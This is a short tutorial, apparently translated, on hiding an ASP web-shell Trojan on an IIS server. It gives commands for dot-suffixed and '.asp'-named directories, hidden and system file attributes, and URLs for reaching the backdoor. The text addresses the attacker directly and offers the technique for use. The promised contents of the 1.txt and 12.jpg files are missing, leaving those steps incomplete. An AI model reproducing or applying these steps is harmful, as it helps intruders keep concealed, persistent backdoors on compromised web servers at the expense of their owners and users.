The following two methods can hide your asp Trojan, you can test it 1. Create a non-standard directory: mkdir images../
Copy the ASP Trojan to the directory: copy c:/inetpub/wwwroot/dbm6.asp c:/inetpub/wwwroot/images../news.asp
Access the ASP Trojan through the web: http://ip/images../news.asp?action=login
How to delete non-standard directories: rmdir images../ /s
2. IIS in Windows will parse the files in the directory ending with .asp to achieve the purpose of hiding our own web page backdoor:
mkdir programme.asp
Create a new 1.txt file with the following content:
Create a new 12.jpg file content: or use the file merged with GIF and ASP
attrib +H +S programme.asp
Access the ASP one sentence Trojan through the web: http://ip/images/programme.asp/1.txt